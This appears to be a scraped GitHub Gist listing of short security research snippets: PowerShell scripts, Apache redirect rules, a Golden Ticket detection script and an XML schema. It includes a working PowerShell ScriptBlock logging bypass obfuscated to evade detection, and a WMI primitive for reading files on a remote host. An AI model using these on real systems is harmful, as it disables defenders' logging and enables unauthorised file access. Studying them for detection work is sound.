Skip to content

Instantly share code, notes, and snippets.

# Author: Matt Graeber, SpecterOps
ls C:\* -Recurse -Include '*.exe', '*.dll' -ErrorAction SilentlyContinue | % {
try {
$Assembly = [Reflection.Assembly]::ReflectionOnlyLoadFrom($_.FullName)
if ($Assembly.GetReferencedAssemblies().Name -contains 'System.Management.Automation') {
$_.FullName
}
} catch {}
}
@curi0usJack
curi0usJack / .htaccess
Last active October 5, 2024 14:07
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
@jaredcatkinson
jaredcatkinson / Test-Ticket.ps1
Created September 20, 2017 21:51
Script to test if a Ticket Granting Ticket (TGT) is forged (a Golden Ticket).
function Test-Condition
{
param
(
[Parameter(Mandatory = $true)]
[bool]
$Result,
[Parameter(Mandatory = $true)]
[string]
@mattifestation
mattifestation / FileReadPrimitive.ps1
Last active June 12, 2023 16:33
A WMI file content read primitive - ROOT/Microsoft/Windows/Powershellv3/PS_ModuleFile
$CimSession = New-CimSession -ComputerName 10.0.0.2
$FilePath = 'C:\Windows\System32\notepad.exe'
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
[Array]::Reverse($FileLengthBytes)
@leechristensen
leechristensen / settingcontent-ms.xsd
Created June 22, 2017 01:43
.settingcontent-ms XML Schema (embedded in shell.dll)
<?xml version="1.0" encoding="utf-8"?>
<xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ac="http://schemas.microsoft.com/Search/2013/SettingContent" targetNamespace="http://schemas.microsoft.com/Search/2013/SettingContent" elementFormDefault="qualified" >
<xsd:annotation>
<xsd:documentation xml:lang="en">Copyright (C) Microsoft. All rights reserved.
Searchable setting content file schema.
</xsd:documentation>
</xsd:annotation>
<xsd:element name="SearchableContent" type="ac:SearchableContentType"/>
<xsd:complexType name="SearchableContentType">
<xsd:sequence>
@cobbr
cobbr / ScriptBlockLogBypass.ps1
Last active September 13, 2024 15:30
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}